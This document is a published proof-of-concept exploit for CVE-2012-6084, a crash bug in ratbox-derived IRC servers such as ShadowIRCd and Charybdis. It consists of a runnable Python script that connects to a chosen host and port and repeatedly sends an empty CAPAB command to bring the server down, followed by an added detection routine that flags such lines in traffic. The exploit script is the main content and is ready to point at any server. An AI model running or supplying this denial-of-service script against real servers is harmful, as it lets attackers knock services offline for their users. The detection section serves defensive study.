Ratbox IRCd Denial Of Service
Source: zempirians.com  Author: Apetrick  Published: 2013-01-05
#!/usr/bin/python3
###################################################################################
#
#      _  _  .__                .__               
#   __| || |_|  |   ____   ____ |__| ____   ____  
#   \   __   /  | _/ __ \ / ___\|  |/  _ \ /    \ 
#    |  ||  ||  |_\  ___// /_/  >  (  <_> )   |  \        http://www.zempirians.com
#   /_  ~~  _\____/\___  >___  /|__|\____/|___|  /
#     |_||_|           \/_____/                \/
#
#   00100011 01101100 01100101 01100111 01101001 01101111 01101110
#
#   Provided by: UberLame, Aph3x, Apetrick, O_O
#
###################################################################################
#
#             -=[ SHADOWIRCD 6.3.3 - Running vulnerable m_capab.c ] =-
#
#         [P]roof [o]f [C]oncept, Null Point Reference, Denial of Service
#
#
###################################################################################
# -=[ EXPLOIT ]=-
#
# Now that a patch has been secured we are releasing a proof of concept to test your
# ircd against this vulnerability. This exploit was designed to work against
# Shadowircd 6.3.3 running the following vulnerable code:
#
#	+VULNERABLE+
#       ../shadowircd/modules/m_capab.c - LINE(40)
#	{{mr_capab, 0}, mg_ignore, mg_ignore, mg_ignore, mg_ignore, mg_ignore}
#
# -=[ SUMMARY ]=-
#
# All versions of Charybdis are vulnerable to a remotely-triggered crash bug
# caused by code originating from ircd-ratbox 2.0.  (Incidentally, this means all
# versions since ircd-ratbox 2.0 are also vulnerable.)
# 
# The bug has to do with server capability negotiation.  A malformed request will
# trigger a crash due to invalid assumptions.
#
# -=[ PATCH ]=-
#
# January 1, 2013 - 12:55 PM GMT-6
# 
# Charybdis 3.4.2, ShadowIRCd 6.3.3 and Ratbox 3.0.8 have been released with an
# integrated patch to resolve this issue.  All admins should upgrade immediately.
#
# -=[ REFERENCE ]=-
#
# http://www.cvedetails.com/cve/CVE-2012-6084/
#
###################################################################################
# Ohai, I Can Has Moar Cycles? <33
#
# Eg: ./<file>.py -t <target> -p <port>
###################################################################################

from argparse import ArgumentParser
import socket


def own( uri, port ):
        sock = socket.socket()
        try:
                # connect() raises on failure; connect_ex() only returns an error code
                sock.connect(( uri, int( port ) ))
        except (OSError, ValueError):
                print( "\t[-] Failed To Connect To {}".format( uri ) )
                exit()

        print( "\t[+] Connected, Sending Payload To {}:{}".format(  uri, port ) )
        while True:
                try:
                        sock.send(b"\x43\x41\x50\x41\x42\x20\x0d\x0a")
                except socket.error as se:
                        print( '\t[!] Owned <3' )
                        break

        sock.close()

if __name__ == '__main__':
        parser = ArgumentParser( description='m_capab DOS PoC, We Can Has Moar Cycles?' )

        parser.add_argument( '-t', '--target', dest='target', default='localhost', help='IRCD Address To Target' )
        parser.add_argument( '-p', '--port', dest='port', default=6667, help='IRCD Port To Target' )

        args = parser.parse_args()

        own( args.target, args.port )
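
For defenders: the payload bytes in the script above decode to `CAPAB ` followed by CRLF, that is, a CAPAB command carrying no parameter. The following is an added example, not part of the original PoC or of any ircd code base, that parses IRC lines from a reassembled client stream and flags such lines; the function names and the sample traffic are constructed for illustration.

```python
# Added detection example: flag CAPAB lines that carry no parameter.
# All names and the SAMPLE traffic below are constructed for illustration.

def parse_irc_line(raw: bytes):
    """Return (command, params) for one IRC line, or None if it has no command."""
    line = raw.rstrip(b"\r\n").decode("utf-8", errors="replace").lstrip(" ")
    if line.startswith(":"):                  # optional ":prefix " is discarded
        line = line.partition(" ")[2].lstrip(" ")
    head, sep, trailing = line.partition(" :")  # " :" introduces the trailing param
    words = head.split()
    if not words:
        return None
    params = words[1:] + ([trailing] if sep else [])
    return words[0].upper(), params             # IRC commands are case-insensitive


def is_empty_capab(raw: bytes) -> bool:
    """True when the line is a CAPAB command with zero parameters."""
    parsed = parse_irc_line(raw)
    return parsed is not None and parsed[0] == "CAPAB" and not parsed[1]


def scan_stream(data: bytes):
    """Scan a reassembled client-to-server byte stream.

    Returns (flagged_line_numbers, leftover) where leftover is the incomplete
    final line to be prepended to the next chunk of the same connection.
    """
    *lines, leftover = data.split(b"\n")
    hits = [n for n, line in enumerate(lines, 1) if is_empty_capab(line)]
    return hits, leftover


# Constructed sample: a normal server handshake with two bad lines mixed in.
SAMPLE = (
    b"PASS constructed-secret TS 6 :00A\r\n"
    b"CAPAB :QS EX CHW IE\r\n"
    b"CAPAB \r\n"
    b"capab\r\n"
    b"SERVER hub.example.net 1 :constructed sample\r\n"
    b"CAPAB "                                  # incomplete line, not judged yet
)

if __name__ == "__main__":
    flagged, rest = scan_stream(SAMPLE)
    print("flagged lines:", flagged, "buffered:", rest)
```
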

 